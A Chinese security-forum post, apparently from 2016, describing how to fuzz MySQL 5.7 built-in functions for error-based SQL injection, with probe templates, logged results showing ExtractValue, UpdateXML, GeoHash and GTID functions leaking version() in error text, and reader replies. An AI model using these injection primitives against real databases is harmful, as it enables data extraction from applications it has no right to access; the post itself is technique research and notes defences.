Mysql报错注入简单测试模型 20160416

测试Mysql环境:Mysql 5.7.12-log Mysql Community Server(GPL)

①收集内置函数
http://dev.mysql.com/doc/refman/5.7/en/dynindex-function.html
②整理列表(注意:①中的索引页把 memcached 命令、libc/PHP 函数名和 MySQL 内部 C 函数也一并列了进来,所以下表中 add()/get()/set()/incr()/decr()/delete()、addslashes()、crypt()/gethostbyname()/setrlimit() 等并不是 MySQL 函数,执行时只会返回 ERROR 1305,属于无害噪声,筛结果时不要把它们当成服务端函数)
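-- ② Candidate list, harvested from the MySQL 5.7 function index (step ①).
-- Every line calls the name with an empty argument list, so each one is
-- *expected* to fail (ERROR 1582 wrong parameter count, or ERROR 1305 for
-- names the server does not know). The list is only the substitution target
-- for the templates in ③; it is not meant to be run for its own sake.
-- The doc index also lists memcached commands, libc/PHP functions and MySQL
-- internal C helpers; those entries are marked inline below. They are
-- harmless noise here (ERROR 1305) but they are not server functions.
-- Version matters: JSON_* and the ST_*GeoHash family exist only from 5.7,
-- so hits from them do not transfer to 5.6 targets (see reply #15).
-- Beyond error-based hits, LOAD_FILE() (file read), SLEEP()/BENCHMARK()
-- (time-based) are injection primitives this error grep will not surface.
select ABS();
select ACOS();
select add();  -- memcached command (presumably picked up from the InnoDB memcached docs), not SQL
select ADDDATE();
select addslashes();  -- PHP function, not MySQL
select ADDTIME();
select AES_DECRYPT();
select AES_ENCRYPT();
select ANY_VALUE();
select Area();
select AsBinary();
select ASCII();
select ASIN();
select AsText();
select AsWKB();
select AsWKT();
select ASYMMETRIC_DECRYPT();
select ASYMMETRIC_DERIVE();
select ASYMMETRIC_ENCRYPT();
select ASYMMETRIC_SIGN();
select ASYMMETRIC_VERIFY();
select ATAN();
select ATAN2();
select AVG();
select BENCHMARK();
select BIN();
select BIT_AND();
select BIT_COUNT();
select BIT_LENGTH();
select BIT_OR();
select BIT_XOR();
select Buffer();
select CAST();
select CEIL();
select CEILING();
select Centroid();
select CHAR();
select CHAR_LENGTH();
select CHARACTER_LENGTH();
select CHARSET();
select E();
select COERCIBILITY();
select COLLATION();
select COMPRESS();
select CONCAT();
select CONCAT_WS();
select CONNECTION_ID();
select Contains();
select CONV();
select CONVERT();
select CONVERT_TZ();
select ConvexHull();
select COS();
select COT();
select COUNT();
select CRC32();
select CREATE_ASYMMETRIC_PRIV_KEY();
select CREATE_ASYMMETRIC_PUB_KEY();
select CREATE_DH_PARAMETERS();
select CREATE_DIGEST();
select Crosses();
select crypt();  -- libc, not MySQL (the server-side equivalent is ENCRYPT())
select CURDATE();
select CURRENT_DATE();
select CURRENT_TIME();
select CURRENT_TIMESTAMP();
select CURRENT_USER();
select CURTIME();
select DATABASE();
select DATE();
select DATE_ADD();
select DATE_FORMAT();
select DATE_SUB();
select DATEDIFF();
select DAY();
select DAYNAME();
select DAYOFMONTH();
select DAYOFWEEK();
select DAYOFYEAR();
select DECODE();
select decr();  -- memcached command, not SQL
select DEFAULT();
select DEGREES();
select delete();  -- memcached command, not SQL
select DES_DECRYPT();
select DES_ENCRYPT();
select Dimension();
select Disjoint();
select Distance();
select ELT();
select ENCODE();
select ENCRYPT();
select EndPoint();
select Envelope();
select Equals();
select EXP();
select EXPORT_SET();
select expr IN ();  -- operator syntax, not a function; as written this is a parse error
select expr NOT IN ();  -- operator syntax, not a function
select ExteriorRing();
select EXTRACT();
select ExtractValue();
select FIELD();
select FIND_IN_SET();
select FLOOR();
select FORMAT();
select FOUND_ROWS();
select FROM_BASE64();
select FROM_DAYS();
select FROM_UNIXTIME();
select GeomCollFromText();
select GeomCollFromWKB();
select GeometryCollection();
select GeometryCollectionFromText();
select GeometryCollectionFromWKB();
select GeometryFromText();
select GeometryFromWKB();
select GeometryN();
select GeometryType();
select GeomFromText();
select GeomFromWKB();
select get();  -- memcached command, not SQL
select GET_FORMAT();
select GET_LOCK();
select gethostbyaddr();  -- libc, not MySQL
select gethostbyaddr_r();  -- libc, not MySQL
select gethostbyname();  -- libc, not MySQL
select gethostbyname_r();  -- libc, not MySQL
select getrusage();  -- libc, not MySQL
select gettimeofday();  -- libc, not MySQL
select GLength();
select GREATEST();
select GROUP_CONCAT();
select GTID_SUBSET();
select GTID_SUBTRACT();
select HEX();
select HOUR();
select IF();
select IFNULL();
select IN();  -- operator, not a function
select incr();  -- memcached command, not SQL
select INET6_ATON();
select INET6_NTOA();
select INET_ATON();
select INET_NTOA();
select INSERT();
select INSTR();
select InteriorRingN();
select Intersects();
select INTERVAL();
select IS_FREE_LOCK();
select IS_IPV4();
select IS_IPV4_COMPAT();
select IS_IPV4_MAPPED();
select IS_IPV6();
select IS_USED_LOCK();
select IsClosed();
select IsEmpty();
select ISNULL();
select IsSimple();
select JSON_APPEND();
select JSON_ARRAY();
select JSON_ARRAY_APPEND();
select JSON_ARRAY_INSERT();
select JSON_CONTAINS();
select JSON_CONTAINS_PATH();
select JSON_DEPTH();
select JSON_EXTRACT();
select JSON_INSERT();
select JSON_KEYS();
select JSON_LENGTH();
select JSON_MERGE();
select JSON_OBJECT();
select JSON_QUOTE();
select JSON_REMOVE();
select JSON_REPLACE();
select JSON_SEARCH();
select JSON_SET();
select JSON_TYPE();
select JSON_UNQUOTE();
select JSON_VALID();
select LAST_DAY();
select LAST_INSERT_ID();
select LCASE();
select LEAST();
select LEFT();
select LENGTH();
select Length();  -- duplicate of LENGTH() (function names are case-insensitive)
select LineFromText();
select LineFromWKB();
select LineString();
select LineStringFromText();
select LineStringFromWKB();
select LN();
select LOAD_FILE();
select LOCALTIME();
select LOCALTIMESTAMP();
select LOCATE();
select LOG();
select LOG10();
select LOG2();
select LOWER();
select LPAD();
select LTRIM();
select MAKE_SET();
select MAKEDATE();
select MAKETIME();
select MASTER_POS_WAIT();
select MATCH();
select MAX();
select MBRContains();
select MBRCoveredBy();
select MBRCovers();
select MBRDisjoint();
select MBREqual();
select MBREquals();
select MBRIntersects();
select MBROverlaps();
select MBRTouches();
select MBRWithin();
select MD5();
select MICROSECOND();
select MID();
select MIN();
select MINUTE();
select MLineFromText();
select MLineFromWKB();
select MOD();
select MONTH();
select MONTHNAME();
select MPointFromText();
select MPointFromWKB();
select MPolyFromText();
select MPolyFromWKB();
select MultiLineString();
select MultiLineStringFromText();
select MultiLineStringFromWKB();
select MultiPoint();
select MultiPointFromText();
select MultiPointFromWKB();
select MultiPolygon();
select MultiPolygonFromText();
select MultiPolygonFromWKB();
select my_open();  -- MySQL internal C helper (mysys), not callable from SQL
select NAME_CONST();
select NOT IN();  -- operator syntax, not a function
select NOW();
select NULLIF();
select NumGeometries();
select NumInteriorRings();
select NumPoints();
select OCT();
select OCTET_LENGTH();
select OLD_PASSWORD();
select ORD();
select Overlaps();
select PASSWORD();
select PERIOD_ADD();
select PERIOD_DIFF();
select PI();
select Point();
select PointFromText();
select PointFromWKB();
select PointN();
select PolyFromText();
select PolyFromWKB();
select Polygon();
select PolygonFromText();
select PolygonFromWKB();
select POSITION();
select POW();
select POWER();
select pthread_mutex();  -- libc/pthreads, not MySQL
select QUARTER();
select QUOTE();
select RADIANS();
select RAND();
select RANDOM_BYTES();
select RELEASE_ALL_LOCKS();
select RELEASE_LOCK();
select REPEAT();
select REPLACE();
select replace();  -- duplicate of REPLACE() above (the name is also a memcached command)
select REVERSE();
select RIGHT();
select ROUND();
select ROW_COUNT();
select RPAD();
select RTRIM();
select SCHEMA();
select SEC_TO_TIME();
select SECOND();
select SESSION_USER();
select set();  -- memcached command, not SQL
select setrlimit();  -- libc, not MySQL
select SHA();
select SHA1();
select SHA2();
select SIGN();
select SIN();
select SLEEP();
select SOUNDEX();
select SPACE();
select SQRT();
select SRID();
select ST_Area();
select ST_AsBinary();
select ST_AsGeoJSON();
select ST_AsText();
select ST_AsWKB();
select ST_AsWKT();
select ST_Buffer();
select ST_Buffer_Strategy();
select ST_Centroid();
select ST_Contains();
select ST_ConvexHull();
select ST_Crosses();
select ST_Difference();
select ST_Dimension();
select ST_Disjoint();
select ST_Distance();
select ST_Distance_Sphere();
select ST_EndPoint();
select ST_Envelope();
select ST_Equals();
select ST_ExteriorRing();
select ST_GeoHash();
select ST_GeomCollFromText();
select ST_GeomCollFromTxt();
select ST_GeomCollFromWKB();
select ST_GeometryCollectionFromText();
select ST_GeometryCollectionFromWKB();
select ST_GeometryFromText();
select ST_GeometryFromWKB();
select ST_GeometryN();
select ST_GeometryType();
select ST_GeomFromGeoJSON();
select ST_GeomFromText();
select ST_GeomFromWKB();
select ST_InteriorRingN();
select ST_Intersection();
select ST_Intersects();
select ST_IsClosed();
select ST_IsEmpty();
select ST_IsSimple();
select ST_IsValid();
select ST_LatFromGeoHash();
select ST_Length();
select ST_LineFromText();
select ST_LineFromWKB();
select ST_LineStringFromText();
select ST_LineStringFromWKB();
select ST_LongFromGeoHash();
select ST_MakeEnvelope();
select ST_MLineFromText();
select ST_MLineFromWKB();
select ST_MPointFromText();
select ST_MPointFromWKB();  -- was missing its "select" in the original list, so it never got probed
select ST_MPolyFromText();
select ST_MPolyFromWKB();
select ST_MultiLineStringFromText();
select ST_MultiLineStringFromWKB();
select ST_MultiPointFromText();
select ST_MultiPointFromWKB();
select ST_MultiPolygonFromText();
select ST_MultiPolygonFromWKB();
select ST_NumGeometries();
select ST_NumInteriorRing();
select ST_NumInteriorRings();
select ST_NumPoints();
select ST_Overlaps();
select ST_PointFromGeoHash();
select ST_PointFromText();
select ST_PointFromWKB();
select ST_PointN();
select ST_PolyFromText();
select ST_PolyFromWKB();
select ST_PolygonFromText();
select ST_PolygonFromWKB();
select ST_Simplify();
select ST_SRID();
select ST_StartPoint();
select ST_SymDifference();
select ST_Touches();
select ST_Union();
select ST_Validate();
select ST_Within();
select ST_X();
select ST_Y();
select StartPoint();
select STD();
select STDDEV();
select STDDEV_POP();
select STDDEV_SAMP();
select STR_TO_DATE();
select STRCMP();
select SUBDATE();
select SUBSTR();
select SUBSTRING();
select SUBSTRING_INDEX();
select SUBTIME();
select SUM();
select SYSDATE();
select SYSTEM_USER();
select TAN();
select TIME();
select TIME_FORMAT();
select TIME_TO_SEC();
select TIMEDIFF();
select TIMESTAMP();
select TIMESTAMPADD();
select TIMESTAMPDIFF();
select TO_BASE64();
select TO_DAYS();
select TO_SECONDS();
select Touches();
select TRIM();
select TRUNCATE();
select UCASE();
select UNCOMPRESS();
select UNCOMPRESSED_LENGTH();
select UNHEX();
select UNIX_TIMESTAMP();
select UpdateXML();
select UPPER();
select USER();
select UTC_DATE();
select UTC_TIME();
select UTC_TIMESTAMP();
select UUID();
select UUID_SHORT();
select VALIDATE_PASSWORD_STRENGTH();
select VALUES();
select VAR_POP();
select VAR_SAMP();
select VARIANCE();
select VERSION();
select WAIT_FOR_EXECUTED_GTID_SET();
select WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS();
select WEEK();
select WEEKDAY();
select WEEKOFYEAR();
select WEIGHT_STRING();
select Within();
select X();
select Y();
select YEAR();
select YEARWEEK();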

③构造测试模型
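-- ③ Probe templates. Substitute every name from the list in ② for
-- "functionname". version() is the probe value because its result
-- ('5.7.12-log' on this box) is easy to spot when a function copies its
-- argument verbatim into the error text — which is the whole point of
-- error-based injection.
-- One template per argument position for arity 1..3, so a function that
-- validates only one particular argument is still reached. The original
-- set repeated (version(),1,1) twice and never probed the third slot;
-- the last line fills that gap.
-- Run this only against a disposable instance you own: a few functions
-- accept the probe as a number and do real work, e.g. SLEEP(version())
-- coerces '5.7.12-log' to 5.7 and sleeps ~5.7 s, and GET_LOCK(version(),1)
-- really acquires a named user lock.
select functionname(version());
select functionname(1,version());
select functionname(version(),1);
select functionname(version(),1,1);
select functionname(1,version(),1);
select functionname(1,1,version());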

④在mysql command line设置log输出位置
tee Y:/sqllog.txt
⑤将③中的模型通过replace的方式放到②中列表里,直接将结果粘贴到command line里。由于列表中包含换行字符,sql语句将会依次执行(约 450 个名字 × 6 个模板 ≈ 2700 条语句)。只在自己可随时丢弃的测试实例上跑:个别函数会把探针当成数字真正执行,例如 SLEEP(version()) 会把 '5.7.12-log' 截成 5.7 而睡眠约 5.7 秒,GET_LOCK(version(),1) 会真的拿一个命名锁;不要拿生产库或别人的库做这个测试。
⑥以-log为关键字通过log文件整理有效的报错注入结果(之所以能用 -log 做关键字,只是因为本机 version() 返回 '5.7.12-log',该后缀表示服务端开启了日志;在没开日志的服务器上 version() 只返回 '5.7.12',这时应改为 grep 完整版本串,或在模板里带上自己可识别的标记,如经典用法 concat(0x7e,version())):
mysql> select ST_LatFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LATFROMGEOHASH
mysql> select ST_LongFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LONGFROMGEOHASH
mysql> select ExtractValue(1,version());
ERROR 1105 (HY000): XPATH syntax error: '.12-log'
mysql> select GTID_SUBSET(version(),1);
ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
mysql> select GTID_SUBTRACT(version(),1);
ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
mysql> select ST_PointFromGeoHash(version(),1);
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function st_pointfromgeohash
mysql> select UpdateXML(1,version(),1);
ERROR 1105 (HY000): XPATH syntax error: '.12-log'


感觉还不错。回头慢慢加大测试pattern看能不能得到更多有趣的结果。两点补充:一是这些结果依赖版本,ST_*GeoHash、JSON_* 等只在 5.7 才有(见 15 楼在 5.6.22 上的复现,直接报 ERROR 1305),对低版本目标要重新筛一遍;二是报错注入的前提是应用把数据库错误原样返回给客户端,参数化查询加上不向用户展示数据库错误信息就能堵住这一类利用。

  1. 1# Cyrils (')(') | 2016-04-16 13:23

    nice~

  2. 2# 小牛牛 | 2016-04-16 13:30

    给楼主赞一个,很不错哈

  3. 3# 坏男孩-A_A | 2016-04-16 13:30

    可以的,学习了

  4. 4# RedFree (‮11:11 11-11-1112 |※(器杀制自) | 2016-04-16 14:19

    漂亮!

  5. 5# Mazing (嘿,一起学习吗) | 2016-04-16 14:59

    好啊好

  6. 6# Azui | 2016-04-16 19:45

    好恐怖..好帅气

  7. 7# 脚本菜菜 | 2016-04-16 19:49

    make

  8. 8# 风之传说 | 2016-04-16 22:49

    给楼主思路赞一个。

  9. 9# 1c3z (你不是一个人在战斗) | 2016-04-16 23:09

    学习。

  10. 10# todaro (学习装逼) | 2016-04-16 23:28

    漂亮!

  11. 11# 书生 (WooYun(白帽子技术社区)) | 2016-04-16 23:51

    M锅没受到地震波及吧

  12. 12# mramydnei (一个逗逼运维) | 2016-04-17 00:30

    @书生 熊本据说确定了35名死亡者。不过我这儿没事

  13. 13# 迦南 (我不是玩黑,我就是认真) | 2016-04-17 08:48

    火钳刘明

  14. 14# todaro (学习装逼) | 2016-04-17 13:47

    这些函数今天再一看,好像之前有人已经测试过了,不知道有没有记错。

  15. 15# jjboom | 2016-04-18 14:26

    mysql> select ST_LatFromGeoHash(version());
    ERROR 1305 (42000): FUNCTION ST_LatFromGeoHash does not exist
    mysql> select ST_LongFromGeoHash(version());
    ERROR 1305 (42000): FUNCTION ST_LongFromGeoHash does not exist
    mysql> select ST_PointFromGeoHash(version(),1);
    ERROR 1305 (42000): FUNCTION ST_PointFromGeoHash does not exist

    赞~。有些函数mysql 5.6.22并没有。

  16. 16# P0ker_L | 2016-04-18 15:52

    为啥是以-log为关键字?

  17. 17# ppt (小伙子,你0day掉了) | 2016-04-18 15:56

  18. 18# jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2016-04-18 17:08

    fuzz大法.

  19. 19# r3d0x8 (' and '1'='2'') | 2016-04-18 22:58

    好方法!

  20. 20# 小红猪 (你以为是我来挖洞的?其实我是来找媳妇的,啊哈哈哈~) | 2016-04-19 09:16

  21. 21# PiaCa (ﻬ10wb 求把 PiaCa 改成 piaca) | 2016-04-19 10:45

    @P0ker_L 版本号里面包含这个

  22. 22#
    hack2012 (www.waitalone.cn) | 2016-04-19 17:11

    这个很不错。。。这个要记录一下。
